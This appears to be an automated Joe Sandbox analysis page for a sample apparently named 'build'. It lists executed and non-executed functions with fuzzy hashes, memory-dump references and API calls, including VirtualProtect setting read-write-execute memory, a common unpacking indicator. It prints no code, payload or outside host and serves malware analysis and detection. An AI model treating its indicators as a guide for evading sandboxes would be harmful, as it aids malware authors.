Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: $JMCL
API String ID: 621844428-1225520770
Opcode ID: dd48e54cf680fd271e0dab93154a7b8b0d676f741f1781182f2fb917eeab6552
Instruction ID: 1f1a233c4ea98c28e290184e1d0bc566697d54f42b4a2dd98467d57f08cf4de7
Opcode Fuzzy Hash: dd48e54cf680fd271e0dab93154a7b8b0d676f741f1781182f2fb917eeab6552
Instruction Fuzzy Hash: 64C15CB5E042288BEB24CF14DD90AEAB7B6FB88300F1481EAD90DA7341D7795ED18F55

Function 0041F810 Relevance: 1.7, APIs: 1, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 004203A3

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 8a0ea8293272a5dce6b18dde29f5876ea0fd1f41c4ae5e383ca135e33276650e
Instruction ID: 41c0bda98abb6affdce0bfdaad6be249c0a48bc92da71cafe1fd5a24dbf5fdb0
Opcode Fuzzy Hash: 8a0ea8293272a5dce6b18dde29f5876ea0fd1f41c4ae5e383ca135e33276650e
Instruction Fuzzy Hash: 1B9179B4E09228CFEB25CB14CC90BEAB776BF84305F1481EAC84D67251D6396ED6CE45

Function 0041FCCF Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 004203A3

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: b391bec8c69c6ea0c80c362058d44944aa2b1426c5d4457fbb903709eddb4fc6
Instruction ID: 22430cc608b4b46f28f225414a516fc4dcb0ea27b6d590589a9f11856cb9d482
Opcode Fuzzy Hash: b391bec8c69c6ea0c80c362058d44944aa2b1426c5d4457fbb903709eddb4fc6
Instruction Fuzzy Hash: 8E71AFF6D101259FE7248B10EC44BFAB7B5EB88310F1081FAD90EA6741E6785EC68E55

Function 0041FEA9 Relevance: 1.7, APIs: 1, Instructions: 170COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 004203A3

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c24bf6d99de0f2a3c11adbcb63d99e7db27727c7d3cd9f5913e1953949dac405
Instruction ID: 468ef1287cf3862ee6a732311484bf04ea925a2ccc64149078e9a72c15c0f2ec
Opcode Fuzzy Hash: c24bf6d99de0f2a3c11adbcb63d99e7db27727c7d3cd9f5913e1953949dac405
Instruction Fuzzy Hash: F661BDF1D102298BEB248B10DC847FAB3B5FB84311F1081EAE90DA6281E7785EC6CF55

Function 00407150 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000040,FFFFEBA4,?,?,?,?,?,?,?,?,00406A5A,?), ref: 0040779F

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e85c90ef5863dd61c7a654771148e6924bd2c10f9f9041b8bfcfa50669615557
Instruction ID: 998609d879f4d36cde1debd14f82a78290edc987e1c20507e84fc6d065adc7b9
Opcode Fuzzy Hash: e85c90ef5863dd61c7a654771148e6924bd2c10f9f9041b8bfcfa50669615557
Instruction Fuzzy Hash: 9A31F6B2D082545BF7188B11DC59AEB7B78EB81310F1441FFD90E67280D63D6AC6CE52

Function 004076BB Relevance: 1.6, APIs: 1, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000040,FFFFEBA4,?,?,?,?,?,?,?,?,00406A5A,?), ref: 0040779F

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9c2b22a18ebb58a2560ddd336db8cb0d0dfd2afaa7fc5d569bcc842e142561c6
Instruction ID: 932dec28702412b53e9c094fda6d120bcd460c0735ecd7e166b51138a84fedff
Opcode Fuzzy Hash: 9c2b22a18ebb58a2560ddd336db8cb0d0dfd2afaa7fc5d569bcc842e142561c6
Instruction Fuzzy Hash: 0121F0B1E086949BE7248B24ED90AEAB774FF85340F1442FBD509672C1D6392A82CF47

Function 00407002 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 91cad57a516e2f4c361eacc58a156d573613a8a0f31843566538594da25e37eb
Instruction ID: b91199c152535c76d48c2b5e435d673f220464ab319cc39e82abbb88fa2171cb
Opcode Fuzzy Hash: 91cad57a516e2f4c361eacc58a156d573613a8a0f31843566538594da25e37eb
Instruction Fuzzy Hash: 5921ACB2D1C5609BE3144B65DC48AEB7B78EF41340F0002FBD9095B083C2396A86CF93

Function 0041FBE1 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 004203A3

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: ab4ead3101172d02aac48522461da7bc08d1452eec5aebfae6fa96207dd12a1a
Instruction ID: 5bc159319ebb743867fb39de3f8c748a28a03fbd673abd2d44e4042212212909
Opcode Fuzzy Hash: ab4ead3101172d02aac48522461da7bc08d1452eec5aebfae6fa96207dd12a1a
Instruction Fuzzy Hash: CC115CF3E041485BF3105624DD45AFF7738DBC1314F1881BBE84986540E5BC9ACB8A97

Function 0040702C Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f6bc614bc64cf056d1a09f5f2bfde908a2a7db6986d7a22e2c0509103412b2f7
Instruction ID: 3c0158fd909a129efc1a5eb41b99e6176bf6047d08ad53226ee2bae0628576df
Opcode Fuzzy Hash: f6bc614bc64cf056d1a09f5f2bfde908a2a7db6986d7a22e2c0509103412b2f7
Instruction Fuzzy Hash: B51176B3E081A05BE3104765EC48EE7BB38EB81310F0442FBD90D67181D6396EC68B93

Function 00406C07 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5731e0e6edc125a2e43a085edf6b776cfc2c4dacd2189dfd6081b11495611bc1
Instruction ID: 9a8444cee67629d71a130239ee861f54f37e657be2337cb6b038551eb8c7450a
Opcode Fuzzy Hash: 5731e0e6edc125a2e43a085edf6b776cfc2c4dacd2189dfd6081b11495611bc1
Instruction Fuzzy Hash: 68114CB2E086405BF3148B21ED55EE77778FB81350F1482FFD50957181D6396A86CB53

Function 004202B2 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 004203A3

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 72de2b23a5a7004e1340f99e268a21924275a9173d8350a07b602b65527988a2
Instruction ID: e29210356c8ac607a074c4d3a0003b51328783218ad205ebd55b70756ab56305
Opcode Fuzzy Hash: 72de2b23a5a7004e1340f99e268a21924275a9173d8350a07b602b65527988a2
Instruction Fuzzy Hash: 5611B4B1E041658BDB24CA14EC947EE7AF5BB80300F6402EAC85E56286C7BC1FC18F46

Function 0040776A Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000040,FFFFEBA4,?,?,?,?,?,?,?,?,00406A5A,?), ref: 0040779F

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d53b0c6e95c7fd54e9a925cc6874bffe05f596334bc776d4928f5b1e923c50d3
Instruction ID: 8855314161c604dab32c9539a428904a4b839c8b04b57f9093ab9272a71fba34
Opcode Fuzzy Hash: d53b0c6e95c7fd54e9a925cc6874bffe05f596334bc776d4928f5b1e923c50d3
Instruction Fuzzy Hash: 8C0149B1E041806BE3248B61DD54EEBBB7CEF80340F0441FFE20957081C635AA86CF52

Non-executed Functions

Function 0052D910 Relevance: 1.7, APIs: 1, Instructions: 207COMMON

Download Yara Rule

APIs

Part of subcall function 00592B09: EnterCriticalSection.KERNEL32(0060F61C,?,?,?,00525158,00616078,?,00000000,005A9CE1,000000FF,?,0042319D), ref: 00592B14
Part of subcall function 00592B09: LeaveCriticalSection.KERNEL32(0060F61C,?,00525158,00616078,?,00000000,005A9CE1,000000FF,?,0042319D), ref: 00592B51

__Init_thread_footer.LIBCMT ref: 0052DB0B

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInit_thread_footerLeave
String ID:
API String ID: 3960375172-0
Opcode ID: ab4d270cbbb53534f8c92a4f8be60fff7eba6527090ddf4d4e5d3127723f146c
Instruction ID: 5d6fafc3de38fa83bbede26ecfe44ae733c6c434a7af38891c4b54fb711eb241
Opcode Fuzzy Hash: ab4d270cbbb53534f8c92a4f8be60fff7eba6527090ddf4d4e5d3127723f146c
Instruction Fuzzy Hash: 857109715009714BD70CCE28E8726F57BA2BB86301F4E827FEB5386AD1C679E652CB50

Function 00592716 Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0059301F

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: dedb4b6ba5bd9499249da44ea6a8597d948c84de17c93b5f33b2e2852dcf6df9
Instruction ID: 7bb6667c9af65f534ab51a75e90a60d57ffd640f6537029fd7c0a6b1cddf6e49
Opcode Fuzzy Hash: dedb4b6ba5bd9499249da44ea6a8597d948c84de17c93b5f33b2e2852dcf6df9
Instruction Fuzzy Hash: A561D471A40609DFDF24CF54D9857AEBFF5FB04310F14852AE816EB2A0D775AA40CB90

Function 00401ECD Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
